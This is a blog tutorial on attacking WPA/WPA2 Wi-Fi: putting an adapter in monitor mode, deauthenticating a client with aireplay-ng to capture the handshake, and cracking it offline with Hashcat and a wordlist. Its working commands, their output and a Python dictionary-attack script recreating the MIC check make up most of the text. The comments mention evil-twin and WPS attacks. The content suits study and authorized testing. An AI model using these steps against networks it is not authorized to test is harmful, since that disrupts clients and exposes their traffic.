
How to Capture & Crack WPA/WPA2 Wireless Passwords

In this tutorial, I will show you how to capture and then crack WPA/WPA2 wireless passwords. I hope this will be the first of a new series of tutorials dedicated to hacking wireless networks.

The weakness in WPA/WPA2-PSK is not that the password is sent over the air: the pre-shared key itself is never transmitted. When a client authenticates to an access point, the two go through a 4-step exchange known as the 4-way handshake. That handshake carries two random nonces and a message integrity code (MIC) computed with a key derived from the password, the SSID, both MAC addresses and those nonces. Anyone who captures the handshake therefore has everything needed to guess passwords offline and check each guess against the MIC, with no further interaction with the network and no lockout to slow them down.

I'll be using the aircrack-ng suite of tools to capture the 4-way handshake, and then Hashcat to crack the wireless password, using the graphics card built into my laptop to speed the whole process up.

To follow along you will need:

Wireless adapter: this needs to be capable of running in monitor mode and of packet injection. I am currently using an Alfa AWUS036NHA USB adapter; you can purchase one through my Amazon affiliate link here https://amzn.to/2zOQriM and everything made from it goes back into Hemp Tutorials to help keep the lights on.

I have also had a lot of success using a TP-Link TL-WN722N https://amzn.to/2N2oaHH, a great little dongle for the price, but the Alfa is the better adapter. The main thing to look for when buying a USB WiFi adapter for hacking/pentesting is the chipset: both adapters above use the Atheros AR9271, whose Linux driver (ath9k_htc) supports monitor mode and injection. Be aware that only the v1 hardware revision of the TL-WN722N has the AR9271; later revisions use a Realtek chipset that does not work out of the box.

Aircrack-ng suite: the latest version can be downloaded from https://www.aircrack-ng.org/; if you are running Kali Linux, a version of the aircrack-ng suite will already be installed.

Hashcat: the latest version can be downloaded from https://hashcat.net/hashcat/ and it is also already installed in Kali Linux. You will need the current drivers (OpenCL or CUDA runtime) for your graphics card, and it should not be run in a virtual machine: a VM normally has no direct access to the host GPU, so Hashcat falls back to the much slower CPU.

Monitor Mode

The first step is to change the mode of the wireless interface from the default managed mode to monitor mode. To check which mode your wireless adapter is currently running in, type iwconfig in the terminal.

$ iwconfig
wlx00c0ca84bd4a IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.

enp4s0 no wireless extensions.

wlp2s0 IEEE 802.11abgn ESSID:"HempsTutorials"
Mode:Managed Frequency:5.18 GHz Access Point: 78:3E:53:F7:2F:33
Bit Rate=300 Mb/s Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=63/70 Signal level=-47 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:41 Missed beacon:0

You can see above that I have two wireless adapters in my laptop (wlp2s0 and wlx00c0ca84bd4a). I am currently running this on Linux Mint, so if you are following along on Kali or another Linux distribution these interfaces will probably be called wlan0 and wlan1.

Notice the Mode: field for each wireless adapter: both are in the default Managed mode at the moment. wlp2s0 is associated to a wireless access point called HempsTutorials and wlx00c0ca84bd4a is not associated to any.

We use airmon-ng to change the mode of the wireless interface into monitor mode (remember, not all wireless cards can go into monitor mode, so check out my recommendations above of two adapters that are tried and tested). To start monitor mode just type airmon-ng start and the name of your wireless interface.

$ sudo airmon-ng start wlx00c0ca84bd4a

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1053 avahi-daemon
1097 avahi-daemon
1098 NetworkManager
1260 wpa_supplicant
1290 dhclient

PHY Interface Driver Chipset

phy0 wlp2s0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24)
phy1 wlx00c0ca84bd4a ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.

(mac80211 monitor mode vif enabled on [phy1]wlan0mon
(mac80211 station mode vif disabled for [phy1]wlx00c0ca84bd4a)

Type iwconfig again in the terminal and you should see the mode on your chosen interface has now changed to monitor.

wlan0mon IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm 
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

To change the wireless interface back into managed mode, just type airmon-ng stop and then the name of your wireless interface, which should now be called wlan0mon.

sudo airmon-ng stop wlan0mon 


PHY Interface Driver Chipset

phy1 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 station mode vif enabled on [phy1]wlan0)

(mac80211 monitor mode vif disabled for [phy1]wlan0mon)
phy0 wlp2s0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24)

If later in this tutorial your capture stops working or you can't get it to start, run airmon-ng check in your terminal; it lists any processes that could interfere with the aircrack-ng suite.

sudo airmon-ng check

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
1053 avahi-daemon
1097 avahi-daemon
1098 NetworkManager
1260 wpa_supplicant
1290 dhclient

You could go through all these processes and kill them one by one, but luckily airmon-ng check kill will kill all the conflicting processes at once.

sudo airmon-ng check kill

The aircrack-ng wiki states this should be done before putting your wireless interface into monitor mode, but other guides tell you to run it after. Personally, I can run the aircrack-ng suite just fine without killing any process, but find out what works best for you and let me know in the comments at the bottom of this tutorial.

Note: if you do run the airmon-ng check kill command you will lose your network connection, as it kills NetworkManager, wpa_supplicant, the DHCP client (dhclient) and avahi. When you are done, start NetworkManager again to get your connection back (on systemd-based distributions: sudo systemctl start NetworkManager).

Capture WPA/WPA2 Password

Now that your wireless adapter is in monitor mode and the processes that might interfere with this attack have been stopped, use airodump-ng to show all the wireless access points in range. Just type airodump-ng and the name of the interface you have just put into monitor mode; in my case this is now called wlan0mon.

sudo airodump-ng wlan0mon

Leave this running for a while as it picks up all the access points and wireless devices you are in range of.

[Figure: airodump-ng showing APs in range]
When airodump-ng is running, the top section lists the access points you are in range of and the bottom section shows which wireless devices (STATION) are associated to which access point (BSSID). You need to pick an access point that has at least one device associated to it: it is the client re-joining the network that produces the handshake, so without a client there is nothing to capture. Once you have found an access point in the list, make a note of its BSSID and channel (CH); we need these to structure the next command and start capturing the 4-way handshake.

Run airodump-ng again, this time focusing the capture on a single access point using the BSSID and channel you just noted, and tell airodump-ng where to save the capture file, followed by the wireless interface that is already in monitor mode:

sudo airodump-ng -c 6 --bssid 00:14:C1:26:47:C0 -w testhemptutorials wlan0mon

-c = channel
--bssid = BSSID of the access point
-w = output file prefix (airodump-ng appends a sequence number and extension, so this capture is written to testhemptutorials-01.cap)

[Figure: airodump-ng locked to the selected access point]

Leaving airodump-ng capturing data from the access point, open another terminal.

De-authenticate An Associated Device

You now need to de-authenticate one of the wireless devices already associated to the access point. When the de-authentication stops, the device automatically re-associates with the access point, and that reconnection is the 4-way handshake you capture.

To start the de-authentication we use aireplay-ng with -0 and a number specifying how many rounds of deauth frames to send (each round in the output below is 64 frames), -a with the BSSID of the access point and -c with the MAC address of the device we want to de-authenticate. In the [x|y ACKs] column the first number is acknowledgements received from the station and the second is from the access point; a station that never ACKs is probably out of your adapter's range. Note that deauthentication frames are unauthenticated in WPA2 unless the network uses Protected Management Frames (802.11w), in which case the client ignores them and this step will not work.

sudo aireplay-ng -0 20 -a 00:14:C1:26:47:C0 -c 08:C5:E1:8C:03:A6 wlan0mon
21:15:32 Waiting for beacon frame (BSSID: 00:14:C1:26:47:C0) on channel 6
21:15:33 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|60 ACKs]
21:15:33 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:34 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [57|70 ACKs]
21:15:34 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [64|64 ACKs]
21:15:35 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [14|60 ACKs]
21:15:35 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|63 ACKs]
21:15:36 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:36 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|64 ACKs]
21:15:37 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|65 ACKs]
21:15:38 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:38 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|69 ACKs]
21:15:39 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:39 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|58 ACKs]
21:15:40 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|66 ACKs]
21:15:40 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|61 ACKs]
21:15:41 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|67 ACKs]
21:15:41 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|65 ACKs]
21:15:42 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|59 ACKs]
21:15:42 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|62 ACKs]
21:15:43 Sending 64 directed DeAuth. STMAC: [08:C5:E1:8C:03:A6] [ 0|69 ACKs]

As soon as the de-authentication stops the device reconnects to the access point and we capture the 4-way handshake. To confirm this, check the top right corner of airodump-ng running in the other terminal: it now says WPA handshake: 00:14:C1:26:47:C0.

[Figure: airodump-ng reporting the captured 4-way handshake]

Once you have captured the handshake you have everything you need, so press Ctrl+C to stop airodump-ng capturing any more data.

Crack WPA/WPA2 Password

Before you start cracking, it is best practice to check that you have actually captured the 4-way handshake. A quick check is aircrack-ng itself: run aircrack-ng testhemptutorials-01.cap with no wordlist and it lists each BSSID in the file with the number of handshakes it found. To look more closely, open the .cap file created by airodump-ng in Wireshark (double-clicking it will do this if Wireshark is installed), type eapol into the filter bar and you should see the four EAPOL-Key messages of the handshake, as below. Hashcat does not need all four: a matching pair (message 1 and 2, or 2 and 3) is enough, because between them they carry both nonces and a MIC to check guesses against.

[Figure: the 4-way handshake (eapol filter) in Wireshark]

To crack the password with Hashcat you need to convert the .cap file into a format Hashcat understands, stripping out everything it does not need. The version of Hashcat used here takes a .hccapx file. There are two ways to produce one: use Hashcat's hosted service at https://hashcat.net/cap2hccapx/, where you upload your .cap file and download the converted .hccapx, or download the Hashcat utilities from their GitHub page https://github.com/hashcat/hashcat-utils/, which contains cap2hccapx and lets you convert the file without uploading it to a server outside your control. Note that since Hashcat 6.0 the .hccapx format and hash mode 2500 are deprecated: current releases expect the hc22000 format produced by hcxpcapngtool from the hcxtools package (hcxpcapngtool -o capture.22000 testhemptutorials-01.cap) together with hash mode 22000.

Now that we have our file converted to .hccapx, it's time to start cracking it with Hashcat. I use my Windows laptop for this as it has an AMD Radeon in it, which Hashcat can use to speed up the whole cracking process. You can use your CPU with Hashcat if you don't have a compatible graphics card, but it will take far longer.

As I am doing a dictionary attack on the WPA2 key, you are going to need a wordlist. If you are running Kali Linux, look in /usr/share/wordlists; rockyou.txt should already be there (some releases ship it compressed as rockyou.txt.gz, so you may need to gunzip it first). If you can't find it, or like me you are running this on something other than Kali, you can download a copy of rockyou.txt from the SkullSecurity password wiki. For this tutorial I used a cut-down version of rockyou.txt, made sure my password was in it, and saved it to a file called test.txt.

To get Hashcat working on cracking your WPA2 key type.

hashcat64.exe -m 2500 C:\location\of\hccapx\file.hccapx C:\Location\of\wordlist\test.txt

This will then quickly run through the wordlist, and if it finds a match you should see something like this:

[Figure: WPA2 password found in Hashcat]

OK, I know password1 is not the most secure password in the world, but this access point is only used for testing and it highlights why you should make your WiFi password stronger. Notice that even with half of the rockyou.txt file I was able to crack this password in around 8 seconds, and it would have been faster with a better graphics card. The only real defence against this attack is a long, random passphrase that does not appear in any wordlist: once the handshake is captured the attacker gets unlimited offline guesses, with no lockout, no rate limiting and no further contact with the network.
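To make concrete what the cracker is actually doing with the handshake (and why it guesses rather than decrypts), here is an added worked example in Python. It is not code from this tutorial, aircrack-ng or Hashcat; it reimplements the 802.11i key derivation and EAPOL-Key MIC check that Hashcat modes 2500/22000 perform. The handshake it checks is constructed inside the script (the SSID, BSSID, station MAC and passphrase are the ones from this tutorial; the nonces and the candidate wordlist are made up), so it runs offline without any capture. It also classifies the four EAPOL-Key messages from their Key Information flags and pairs message 1 with message 2 by replay counter, which is the same check you make when deciding whether a capture is complete.

```python
"""WPA2-PSK four-way handshake check and offline dictionary attack in pure Python.

Added example: not code from the tutorial, aircrack-ng or hashcat. The handshake
below is CONSTRUCTED (SSID, MACs and passphrase taken from the tutorial; nonces
and wordlist made up) so the script runs offline without a capture.
"""
import hashlib
import hmac
import struct

# --- 802.11i key derivation ----------------------------------------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK via PRF-384 (CCMP). Bytes 0..15 are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


# --- EAPOL-Key frames (802.1X header + 802.11 Key Descriptor) -------------------
# version(1) type(1) length(2) | desc_type(1) key_info(2) key_len(2) replay(8)
# nonce(32) iv(16) rsc(8) id(8) mic(16) data_len(2) data(...)
KEY_HDR = ">BHHQ32s16s8s8s16sH"
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8   # 81: MIC occupies frame[81:97]
KI_ACK, KI_MIC, KI_SECURE = 0x80, 0x100, 0x200      # Key Information flag bits


def build_eapol_key(key_info: int, replay: int, nonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    body = struct.pack(KEY_HDR, 2, key_info, 16, replay, nonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key Descriptor Version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def parse_eapol_key(frame: bytes) -> dict:
    f = struct.unpack_from(KEY_HDR, frame, 4)
    return {"key_info": f[1], "replay": f[3], "nonce": f[4], "mic": f[8], "frame": frame}


def message_number(key_info: int) -> int:
    """Which of the four handshake messages this is, from the Key Information flags."""
    if key_info & KI_ACK:
        return 3 if key_info & KI_MIC else 1
    return 4 if key_info & KI_SECURE else 2


def select_pair(frames):
    """First M1/M2 pair with the same replay counter: ANonce from M1, SNonce + MIC from M2."""
    msgs = [parse_eapol_key(fr) for fr in frames]
    for m1 in (m for m in msgs if message_number(m["key_info"]) == 1):
        for m2 in (m for m in msgs if message_number(m["key_info"]) == 2):
            if m1["replay"] == m2["replay"]:
                return m1["nonce"], m2
    return None


def crack(ssid, aa, spa, anonce, m2, wordlist):
    """Dictionary attack: recompute the M2 MIC for each candidate until one matches."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, m2["nonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, m2["frame"]), m2["mic"]):
            return candidate
    return None


# --- Constructed handshake (sample data, not a real capture) --------------------
SSID = "HempsTutorials"
AA = bytes.fromhex("0014C12647C0")    # access point BSSID from the tutorial
SPA = bytes.fromhex("08C5E18C03A6")   # station MAC from the tutorial
ANONCE = bytes(range(0xA0, 0xC0))     # made-up 32-byte nonces
SNONCE = bytes(range(0x10, 0x30))


def constructed_handshake(passphrase: str = "password1") -> list:
    """Four EAPOL-Key frames as a real AP/station pair would exchange them."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    m1 = build_eapol_key(0x008A, 1, ANONCE)                   # ACK, no MIC
    m2 = build_eapol_key(0x010A, 1, SNONCE)                   # MIC, same replay counter as M1
    m2 = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]
    m3 = build_eapol_key(0x13CA, 2, ANONCE)                   # ACK + MIC + Install + Secure
    m4 = build_eapol_key(0x030A, 2, b"\x00" * 32)             # MIC + Secure, zero nonce
    return [m1, m2, m3, m4]  # M3/M4 MICs left zero: we only verify against M2


def demo(wordlist=("123456", "letmein", "password1", "qwerty")):
    anonce, m2 = select_pair(constructed_handshake())
    return crack(SSID, AA, SPA, anonce, m2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Run it as a script and it prints the recovered passphrase. The PBKDF2 step is the expensive part (4096 HMAC-SHA1 rounds per guess) and is the same work Hashcat parallelises on the GPU; it depends only on the passphrase and SSID, not on the handshake, which is why the attack scales with hash rate and why a long random passphrase is the only real defence.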

If you have any questions about anything above or you feel I have missed something out, please leave me a comment below.

Extra Reading:

Aircrack Wiki: http://www.aircrack-ng.org/doku.php?id=airmon-ng

HashCat Wiki: https://hashcat.net/wiki/

Hemp

IT and security expert with 20+ years of experience. With over two decades of experience in the dynamic field of Information Technology and security, I have honed my skills to become a leading expert in safeguarding digital landscapes. My passion for technology and an unquenchable thirst for knowledge have driven me to stay at the forefront of the ever-evolving IT industry.

8 thoughts on "How to Capture & Crack WPA/WPA2 Wireless Passwords"

  1. So, dictionary attacks are just guesswork, like a kid trying all name combinations on his neighbour's WiFi. Why can't we decrypt the captured handshake? Or is there a way to do so? If we know how it works, what encryption technique it uses, and have all the dedicated resources, then why not reverse engineer it?

    1. Hi Ashish

      Thanks for your comment. The whole reason WPA encryption is used is because, without the key, there is no easy way to decrypt the handshake, so the best option is to try to guess the key.

      The encryption before WPA was WEP, and it was fundamentally flawed. Using aireplay-ng you can replay ARP packets to generate new unique IVs (Initialization Vectors). In turn, aircrack-ng uses the new unique IVs to crack the WEP key without having to do any brute forcing at all.

      However, all is not lost if you can't crack a WPA key: there are always WPS attacks like Pixie Dust, or techniques like an evil twin, where you get the target to connect to your access point and, with a bit of social engineering, may be able to get the target to give you their WiFi password.

      Hemp

        1. lol, all the ways are difficult. As I said above, there is no way to decrypt the hash without brute-forcing it unless you have access to the private key; then you might be able to decrypt the communications. Without that, you either have to attack WPS or set up an evil twin.

  2. I have a cap file but it cannot crack. Pls help, pls reply and give me your email ID, I will send you the .cap file so you can crack it for me.

    1. So Ayush, I could crack your cap file but I would not do it for free, as my cracking rig costs money to run.

      Also, how do I know you are doing this ethically???

      Hemp
